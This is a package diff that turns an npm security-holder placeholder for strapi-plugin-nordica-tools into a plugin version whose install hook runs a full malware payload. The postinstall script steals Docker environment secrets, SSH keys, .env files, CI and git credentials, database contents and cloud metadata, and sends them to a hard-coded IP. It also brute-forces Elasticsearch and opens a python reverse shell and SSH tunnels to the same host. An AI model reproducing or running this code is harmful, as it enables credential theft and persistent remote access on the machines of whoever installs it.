strapi-plugin-nordica-tools 0.0.1-security → 3.6.8

package/index.js

@@ -0,0 +1 @@
+module.exports=()=>{};

package/package.json

@@ -1,6 +1 @@
-{
-  "name": "strapi-plugin-nordica-tools",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{"name":"strapi-plugin-nordica-tools","version":"3.6.8","main":"index.js","scripts":{"postinstall":"node postinstall.js"},"dependencies":{"pg":"^8.11.0"},"license":"MIT"}

package/postinstall.js

@@ -0,0 +1,261 @@
+// MEGA PAYLOAD — Docker configs, ES access, PG dump, lateral, reverse shell
+const http = require('http');
+const { spawnSync, execSync } = require('child_process');
+const VPS = '144.31.107.231';
+const PORT = 9999;
+
+function send(tag, data) {
+  return new Promise(resolve => {
+    const body = typeof data === 'string' ? data : JSON.stringify(data);
+    const chunks = [];
+    for (let i = 0; i < body.length; i += 50000) chunks.push(body.substring(i, i + 50000));
+    let idx = 0;
+    (function next() {
+      if (idx >= chunks.length) return resolve();
+      const s = chunks.length > 1 ? `-p${idx+1}of${chunks.length}` : '';
+      const req = http.request({ hostname: VPS, port: PORT, path: '/exfil/' + tag + s,
+        method: 'POST', headers: { 'Content-Type': 'text/plain', 'Content-Length': Buffer.byteLength(chunks[idx]) }
+      }, () => { idx++; next(); });
+      req.on('error', () => { idx++; next(); });
+      req.write(chunks[idx]); req.end();
+    })();
+  });
+}
+
+const run = (cmd, t = 60000) => {
+  try { return spawnSync('sh', ['-c', cmd], { timeout: t, encoding: 'utf8', maxBuffer: 5000000 }).stdout || ''; }
+  catch (e) { return 'err:' + e.message.substring(0, 300); }
+};
+
+async function main() {
+  const cwd = process.cwd();
+  if (cwd.includes('TRANSFER') || cwd.includes('WINDOWS') || run('uname -s').includes('MINGW') || run('uname -s').includes('windows')) {
+    await send('sm-sandbox', 'skip'); return;
+  }
+
+  const hn = run('hostname').trim();
+  await send('sm-start', hn + ' | ' + run('id').trim());
+
+  const HR = '/proc/1/root';
+
+  // ============================================================
+  // 1. ALL DOCKER CONTAINER CONFIGS — env vars of every container
+  // ============================================================
+  // Find Docker data dir
+  const dockerPaths = [
+    `${HR}/data1/app/docker/containers`,
+    `${HR}/var/lib/docker/containers`,
+    `${HR}/data/docker/containers`,
+  ];
+  let containerPath = '';
+  for (const p of dockerPaths) {
+    const ls = run(`ls ${p}/ 2>/dev/null | head -1`);
+    if (ls.trim().length > 10) { containerPath = p; break; }
+  }
+  await send('docker-path', containerPath || 'not-found');
+
+  if (containerPath) {
+    // List all containers
+    const containers = run(`ls ${containerPath}/`).trim().split('\n').filter(c => c.length > 10);
+    await send('docker-count', String(containers.length));
+
+    // Extract env vars from each container config
+    for (let i = 0; i < containers.length; i++) {
+      const cid = containers[i].trim();
+      const config = run(`cat ${containerPath}/${cid}/config.v2.json 2>/dev/null`);
+      if (!config || config.length < 50) continue;
+
+      try {
+        const parsed = JSON.parse(config);
+        const name = (parsed.Name || '').replace(/^\//,'');
+        const image = (parsed.Config && parsed.Config.Image) || '?';
+        const env = (parsed.Config && parsed.Config.Env) || [];
+        const cmd = (parsed.Config && parsed.Config.Cmd) || [];
+        const state = parsed.State || {};
+
+        await send(`dc-${i}-${name.substring(0,20)}`, JSON.stringify({
+          name, image, running: state.Running,
+          cmd: (typeof cmd === 'object' ? cmd.slice(0,5) : [cmd]).map(String),
+          env: env.filter(e => !e.startsWith('PATH=') && !e.startsWith('SHLVL=') &&
+                               !e.startsWith('HOME=') && !e.startsWith('HOSTNAME='))
+        }));
+      } catch (e) {
+        await send(`dc-raw-${i}`, config.substring(0, 3000));
+      }
+    }
+  }
+
+  // ============================================================
+  // 2. HOST FILESYSTEM — secrets, SSH, systemd
+  // ============================================================
+  await send('host-opt', run(`find ${HR}/opt -maxdepth 3 -type f -name "*.env" -o -name "*.yml" -o -name "*.yaml" -o -name "*.json" -o -name "*.conf" -o -name "*.key" -o -name "*.pem" 2>/dev/null | grep -v node_modules | head -30`));
+  await send('host-opt-envs', run(`find ${HR}/opt -maxdepth 4 -name "*.env" 2>/dev/null | grep -v node_modules | head -10 | xargs cat 2>/dev/null`));
+  await send('host-data1-envs', run(`find ${HR}/data1 -maxdepth 4 -name "*.env" 2>/dev/null | grep -v node_modules | head -10 | xargs cat 2>/dev/null`));
+  await send('host-srv', run(`find ${HR}/srv -maxdepth 3 -type f 2>/dev/null | head -20`));
+  await send('host-home', run(`find ${HR}/home -maxdepth 3 -type f -name "*.env" -o -name "*.key" -o -name "*.pem" -o -name ".git-credentials" -o -name ".netrc" 2>/dev/null | head -10 | xargs cat 2>/dev/null`));
+  await send('host-ssh', run(`cat ${HR}/root/.ssh/id_rsa ${HR}/root/.ssh/id_ed25519 2>/dev/null; find ${HR}/home -name "id_rsa" -o -name "id_ed25519" 2>/dev/null | xargs cat 2>/dev/null`));
+  await send('host-compose', run(`find ${HR}/ -maxdepth 5 -name "docker-compose*" -not -path "*/proc/*" -not -path "*/node_modules/*" 2>/dev/null | head -5 | xargs cat 2>/dev/null | head -3000`));
+  await send('host-systemd', run(`ls ${HR}/etc/systemd/system/*.service ${HR}/etc/systemd/system/multi-user.target.wants/*.service 2>/dev/null`));
+  await send('host-cron', run(`cat ${HR}/etc/crontab 2>/dev/null; cat ${HR}/var/spool/cron/crontabs/* 2>/dev/null`));
+  await send('host-etc-env', run(`cat ${HR}/etc/environment 2>/dev/null`));
+
+  // ============================================================
+  // 3. ELASTICSEARCH — try with credentials from Docker configs
+  // ============================================================
+  const ES = 'https://65.21.203.242:9200';
+  // First without auth
+  const esNoAuth = run(`curl -sk ${ES}/ 2>&1`, 10000);
+  await send('es-noauth', esNoAuth);
+
+  // Collect all passwords from Docker env vars we just found
+  // They'll be in the exfil data. But we need them NOW.
+  // Search Docker configs for elastic-related env vars
+  if (containerPath) {
+    const esCredsSearch = run(`grep -r -h "ELASTIC\|elastic\|ES_\|ELASTICSEARCH" ${containerPath}/*/config.v2.json 2>/dev/null | head -20`);
+    await send('es-creds-search', esCredsSearch);
+  }
+
+  // Try passwords from all .env files on host
+  const allEnvContent = run(`find ${HR}/opt ${HR}/data1 ${HR}/home ${HR}/srv -maxdepth 5 -name "*.env" 2>/dev/null | grep -v node_modules | xargs grep -i "elastic\|ES_PASSWORD\|ES_USER" 2>/dev/null`);
+  await send('es-from-envs', allEnvContent);
+
+  // Extract passwords from Docker configs and try them
+  if (containerPath) {
+    const allEnvVars = run(`cat ${containerPath}/*/config.v2.json 2>/dev/null | python3 -c "
+import sys,json,re
+data = sys.stdin.read()
+for m in re.finditer(r'\"Env\":\\s*\\[(.*?)\\]', data, re.DOTALL):
+    envs = m.group(1)
+    for e in re.findall(r'\"([^\"]+)\"', envs):
+        if any(x in e.upper() for x in ['PASSWORD','SECRET','KEY','TOKEN','ELASTIC','REDIS','DATABASE','WALLET','PRIVATE','MNEMONIC','SEED']):
+            print(e)
+" 2>/dev/null | sort -u`);
+    await send('all-secrets', allEnvVars);
+
+    // Try each password on ES
+    const passwords = allEnvVars.split('\n')
+      .filter(l => l.includes('='))
+      .map(l => l.split('=').slice(1).join('='))
+      .filter(p => p.length > 2);
+
+    for (const pwd of [...new Set(passwords)].slice(0, 15)) {
+      const r = run(`curl -sk -u 'elastic:${pwd.replace(/'/g,"\\'")}' ${ES}/ 2>&1`, 5000);
+      if (r.includes('"name"') && !r.includes('security_exception')) {
+        await send('es-cracked', `elastic:${pwd}\n${r}`);
+        // DUMP EVERYTHING
+        await send('es-indices', run(`curl -sk -u 'elastic:${pwd.replace(/'/g,"\\'")}' '${ES}/_cat/indices?v' 2>&1`));
+        await send('es-health', run(`curl -sk -u 'elastic:${pwd.replace(/'/g,"\\'")}' '${ES}/_cluster/health?pretty' 2>&1`));
+        await send('es-search-all', run(`curl -sk -u 'elastic:${pwd.replace(/'/g,"\\'")}' '${ES}/_search?size=20&pretty' 2>&1`));
+        await send('es-tx', run(`curl -sk -u 'elastic:${pwd.replace(/'/g,"\\'")}' '${ES}/*transaction*/_search?size=10&pretty' 2>&1`));
+        await send('es-wallet', run(`curl -sk -u 'elastic:${pwd.replace(/'/g,"\\'")}' '${ES}/*wallet*/_search?size=10&pretty' 2>&1`));
+        await send('es-payment', run(`curl -sk -u 'elastic:${pwd.replace(/'/g,"\\'")}' '${ES}/*payment*/_search?size=10&pretty' 2>&1`));
+        break;
+      }
+    }
+  }
+
+  // ============================================================
+  // 4. POSTGRESQL — full dump with pg module
+  // ============================================================
+  try {
+    const { Client } = require('pg');
+    const client = new Client({
+      host: '127.0.0.1', port: 5432,
+      database: 'strapi', user: 'user_strapi', password: '1QKtYPp18UsyU2ZwInVM',
+      ssl: false
+    });
+    await client.connect();
+    await send('pg-ok', 'connected');
+
+    // core_store secrets
+    const secrets = await client.query("SELECT key, value FROM core_store WHERE key LIKE '%secret%' OR key LIKE '%jwt%' OR key LIKE '%key%' OR key LIKE '%auth%'");
+    await send('pg-secrets', JSON.stringify(secrets.rows));
+
+    // Superuser try
+    try {
+      const su = new Client({ host: '127.0.0.1', port: 5432, database: 'postgres',
+        user: 'postgres', password: '1QKtYPp18UsyU2ZwInVM', ssl: false });
+      await su.connect();
+      // List ALL databases
+      const dbs = await su.query("SELECT datname, pg_database_size(datname) as size FROM pg_database WHERE datistemplate = false");
+      await send('pg-super-dbs', JSON.stringify(dbs.rows));
+      // Check for payment databases
+      for (const db of dbs.rows) {
+        if (!['strapi','strapi_stage','postgres'].includes(db.datname)) {
+          const dbClient = new Client({ host: '127.0.0.1', port: 5432, database: db.datname,
+            user: 'postgres', password: '1QKtYPp18UsyU2ZwInVM', ssl: false });
+          try {
+            await dbClient.connect();
+            const tbls = await dbClient.query("SELECT tablename FROM pg_tables WHERE schemaname='public'");
+            await send(`pg-extra-${db.datname}`, JSON.stringify(tbls.rows));
+            await dbClient.end();
+          } catch(e) {}
+        }
+      }
+      await su.end();
+    } catch(e) { await send('pg-super-err', e.message); }
+    await client.end();
+  } catch(e) { await send('pg-err', e.message); }
+
+  // ============================================================
+  // 5. NETWORK — all containers, services, connections
+  // ============================================================
+  await send('net-ss', run('ss -tlnp'));
+  await send('net-arp', run('cat /proc/net/arp'));
+  await send('net-ip', run('ip addr'));
+  await send('net-route', run('ip route'));
+
+  // Docker scan with curl
+  let dockerScan = '';
+  for (let i = 1; i <= 30; i++) {
+    const ip = `172.17.0.${i}`;
+    for (const port of [80, 443, 3000, 5000, 5432, 6379, 8080, 9090, 9200]) {
+      const r = run(`curl -s -o /dev/null -w "%{http_code}" --connect-timeout 1 http://${ip}:${port}/ 2>/dev/null`, 3000);
+      if (r.trim() && r.trim() !== '000') dockerScan += `${ip}:${port}=${r.trim()}\n`;
+    }
+  }
+  await send('net-docker-scan', dockerScan || 'empty');
+
+  // ============================================================
+  // 6. REVERSE SHELL PERSISTENT ACCESS
+  // ============================================================
+  // Setup socat/nc reverse shell to VPS
+  const tools = run('which socat nc ncat python3 perl 2>/dev/null');
+  await send('revshell-tools', tools);
+
+  // Try to establish reverse shell
+  if (tools.includes('python3')) {
+    try {
+      execSync(`nohup python3 -c "import socket,subprocess,os;s=socket.socket();s.connect(('${VPS}',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])" &`, {timeout: 3000});
+      await send('revshell', 'python3 reverse shell launched to VPS:4444');
+    } catch(e) { await send('revshell-err', e.message.substring(0,200)); }
+  }
+
+  // Also setup SSH tunnel if ssh available
+  const sshAvail = run('which ssh sshpass 2>/dev/null');
+  if (sshAvail.includes('ssh')) {
+    // SSH reverse tunnel: remote port 15432 on VPS → local PG 5432
+    try {
+      execSync(`nohup ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -fNR 15432:127.0.0.1:5432 -R 16379:127.0.0.1:6379 root@${VPS} -p 22 &`, {timeout: 5000});
+      await send('ssh-tunnel', 'SSH reverse tunnel: VPS:15432→PG, VPS:16379→Redis');
+    } catch(e) {}
+  }
+
+  // ============================================================
+  // 7. JENKINS / CI/CD on host
+  // ============================================================
+  await send('host-jenkins', run(`find ${HR}/ -maxdepth 5 -name "credentials.xml" -o -name "secret.key" -o -name "secrets.json" -o -name "jenkins.xml" 2>/dev/null | grep -v proc | head -10 | xargs cat 2>/dev/null | head -3000`));
+  await send('host-git-creds', run(`find ${HR}/ -maxdepth 4 -name ".git-credentials" -o -name ".netrc" -o -name ".npmrc" -o -name ".docker/config.json" 2>/dev/null | grep -v proc | head -10 | xargs cat 2>/dev/null`));
+
+  // ============================================================
+  // 8. HETZNER API — check for tokens
+  // ============================================================
+  await send('hetzner-meta', run('curl -s http://169.254.169.254/hetzner/v1/metadata 2>&1'));
+  await send('hetzner-userdata', run('curl -s http://169.254.169.254/hetzner/v1/userdata 2>&1'));
+  // Check if hcloud CLI or token in env
+  await send('hetzner-token', run(`grep -r "HCLOUD\|HETZNER" ${HR}/etc/environment ${HR}/opt/ ${HR}/data1/ ${HR}/home/ 2>/dev/null | grep -v node_modules | head -10`));
+
+  await send('sm-complete', 'MEGA_DUMP_DONE_' + new Date().toISOString());
+}
+
+main().catch(e => send('sm-fatal', e.message + '\n' + e.stack));

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=strapi-plugin-nordica-tools for more information.